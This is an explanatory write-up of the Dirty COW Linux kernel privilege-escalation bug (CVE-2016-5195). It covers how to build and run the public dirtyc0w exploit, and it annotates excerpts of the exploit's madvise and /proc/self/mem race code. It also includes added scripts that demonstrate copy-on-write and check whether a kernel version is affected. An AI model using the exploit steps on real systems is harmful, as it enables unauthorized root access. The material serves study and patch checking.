Linux root exploit - Dirty Cow (dirtyc0w) - CVE-2016-5195
https://dirtycow.ninja/
- allows local privilege escalation: user (uid 1000) -> root (uid 0)
- found in the wild by Phil Oester; the original author of the exploit is unknown
https://github.com/dirtycow/dirtycow.github.io
1) Create a test Linux machine (with a vulnerable kernel)
2) Download the repo https://github.com/dirtycow/dirtycow.github.io
git clone git@github.com:dirtycow/dirtycow.github.io.git
3) Compile the exploit
gcc -pthread dirtyc0w.c -o dirtyc0w
4) Create a file owned by root
sudo su root
vim root_file
echo "can I write it?" > root_file    (a regular user can read this file but not write to it)
5) Write to root_file via dirtyc0w
./dirtyc0w root_file "yes I can!"
cat root_file
dirtyc0w.c code (https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c):
f=open(argv[1],O_RDONLY); ## open the target file read-only
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0); ## MAP_PRIVATE - create a private copy-on-write mapping of the file
printf("mmap %zx\n\n",(uintptr_t) map); ## print the address the file was mapped at
pthread_create(&pth1,NULL,madviseThread,argv[1]); ## thread 1
pthread_create(&pth2,NULL,procselfmemThread,argv[2]); ## thread 2
## thread 1
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,100,MADV_DONTNEED); ## syscall: tell the kernel the first 100 bytes of the mapping are not needed for now
## from the madvise(2) man page: subsequent accesses of pages in the range will succeed, but will result in either repopulating the memory contents from the up-to-date
## contents of the underlying mapped file (for shared file mappings, shared anonymous mappings, and shmem-based techniques such as
## thread 2
int f=open("/proc/self/mem",O_RDWR);
## open the proc file
## /proc is a pseudo-filesystem exposing information about processes
## /proc/self is the current process
## /proc/self/mem is its memory
lseek(f,(uintptr_t) map,SEEK_SET); ## seek to the address of the mapping
c+=write(f,str,strlen(str)); ## write the string at that address
## this is meant to write to the private copy-on-write page; the race makes it hit the file-backed page instead
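As an added illustration (not code from the page or the dirtycow repo) of the copy-on-write guarantee the race above subverts: a write into a MAP_PRIVATE mapping of a read-only file normally lands in a private page and the file stays untouched, while a writable MAP_SHARED mapping of the same read-only descriptor is refused outright. It assumes Linux (or another Unix where Python's mmap exposes MAP_PRIVATE/MAP_SHARED) and uses a temporary file as a stand-in for root_file.

```python
import mmap
import os
import tempfile


def cow_demo(original=b"can I write it?", attempt=b"yes I can!"):
    """Map a read-only file MAP_PRIVATE, write into the mapping, and return
    (mapping contents, file contents, whether a writable MAP_SHARED mapping
    of the same read-only descriptor was refused)."""
    # Constructed stand-in for the root-owned root_file from the walkthrough.
    fd, path = tempfile.mkstemp()
    os.write(fd, original)
    os.close(fd)
    fd = os.open(path, os.O_RDONLY)  # same as the exploit's open(argv[1], O_RDONLY)
    try:
        # A writable MAP_SHARED mapping of a read-only descriptor is refused
        # (EACCES), because shared writes would go straight to the file.
        try:
            mmap.mmap(fd, len(original), flags=mmap.MAP_SHARED,
                      prot=mmap.PROT_READ | mmap.PROT_WRITE)
            shared_refused = False
        except PermissionError:
            shared_refused = True
        # A writable MAP_PRIVATE mapping is allowed: the first write triggers
        # copy-on-write, so the new bytes land in a private page, not in the file.
        # Dirty COW's race gets the write applied to the file-backed page instead.
        m = mmap.mmap(fd, len(original), flags=mmap.MAP_PRIVATE,
                      prot=mmap.PROT_READ | mmap.PROT_WRITE)
        m[:len(attempt)] = attempt
        mapping_now = bytes(m)
        m.close()
        with open(path, "rb") as fh:
            file_now = fh.read()
        return mapping_now, file_now, shared_refused
    finally:
        os.close(fd)
        os.unlink(path)


if __name__ == "__main__":
    mapping_now, file_now, shared_refused = cow_demo()
    print("mapping :", mapping_now)
    print("file    :", file_now)
    print("MAP_SHARED+PROT_WRITE on O_RDONLY fd refused:", shared_refused)
```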
Linus Torvalds, in the commit message of the fix:
"This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race for write access") but that was then undone due to problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug")."
Dirty bit - "A dirty bit or modified bit is a bit that is associated with a block of computer memory and indicates whether or not the corresponding block of memory has been modified. The dirty bit is set when the processor writes to (modifies) this memory. The bit indicates that its associated block of memory has been modified and has not been saved to storage yet. When a block of memory is to be replaced, its corresponding dirty bit is checked to see if the block needs to be written back to secondary memory before being replaced or if it can simply be removed. Dirty bits are used by the CPU cache and in the page replacement algorithms of an operating system."
https://en.wikipedia.org/wiki/Dirty_bit
Page table entry: https://www.kernel.org/doc/gorman/html/understand/understand006.html
Madvise code: https://github.com/torvalds/linux/blob/5924bbecd0267d87c24110cbe2041b5075173a25/mm/madvise.c#L452
GUP code: https://github.com/torvalds/linux/blob/master/mm/gup.c
If your kernel version is earlier than the following, you are affected:
4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS
3.16.36-1+deb8u2 for Debian 8
3.2.82-1 for Debian 7
4.7.8-1 for Debian unstable
Check the running kernel release and version with:
uname -rv
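An added helper (not from the page) that turns `uname -rv` output into the distro kernel package version and compares it against the table above. It assumes the usual distro formats: Ubuntu prints the ABI in the release ("4.4.0-45-generic") and the upload number in the version ("#66-Ubuntu ..."), giving package 4.4.0-45.66, while Debian prints the package version directly ("... SMP Debian 3.16.36-1+deb8u2 (...)"); the version comparison is a simplified stand-in for dpkg --compare-versions, and the sample strings are constructed.

```python
import re

# Fixed kernel package versions from the table above; anything older is affected.
FIXED = {
    "Ubuntu 16.10": "4.8.0-26.28",
    "Ubuntu 16.04 LTS": "4.4.0-45.66",
    "Ubuntu 14.04 LTS": "3.13.0-100.147",
    "Ubuntu 12.04 LTS": "3.2.0-113.155",
    "Debian 8": "3.16.36-1+deb8u2",
    "Debian 7": "3.2.82-1",
    "Debian unstable": "4.7.8-1",
}


def version_key(version):
    """Split '3.16.36-1+deb8u2' into comparable chunks: digit runs compare as
    numbers, letter runs as text. Simplified stand-in for dpkg --compare-versions
    (enough for the versions in the table, not a full reimplementation)."""
    return tuple((1, int(t)) if t.isdigit() else (0, t)
                 for t in re.findall(r"\d+|[A-Za-z]+", version))


def package_version(uname_rv):
    """Recover the distro kernel package version from `uname -rv` output (assumed formats).
    Debian carries it in the version string: '... SMP Debian 3.16.36-1+deb8u2 (...)'.
    Ubuntu splits it: release '4.4.0-45-generic' + version '#66-Ubuntu ...' -> 4.4.0-45.66."""
    release, version = uname_rv.strip().split(None, 1)
    debian = re.search(r"Debian (\S+)", version)
    if debian:
        return debian.group(1)
    abi = re.match(r"(\d+\.\d+\.\d+-\d+)-", release)
    upload = re.match(r"#(\d+)-Ubuntu", version)
    if abi and upload:
        return f"{abi.group(1)}.{upload.group(1)}"
    raise ValueError(f"unrecognised uname -rv output: {uname_rv!r}")


def is_affected(uname_rv, distro):
    """True when the running kernel package is older than the fixed version for distro."""
    return version_key(package_version(uname_rv)) < version_key(FIXED[distro])


if __name__ == "__main__":
    # Constructed sample outputs, not captured from real hosts.
    samples = [
        ("Ubuntu 16.04 LTS", "4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016"),
        ("Ubuntu 16.04 LTS", "4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016"),
        ("Debian 8", "3.16.0-4-amd64 #1 SMP Debian 3.16.36-1+deb8u1 (2016-09-03)"),
    ]
    for distro, out in samples:
        print(distro, package_version(out), "AFFECTED" if is_affected(out, distro) else "fixed")
```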
Sources:
1) https://www.youtube.com/watch?v=kEsshExn7aE
2) https://www.youtube.com/watch?v=99sR7H0MMVw&index=20&list=PLh6V3IQZSBSY4G38FEgJ9KDTBOrpAArO2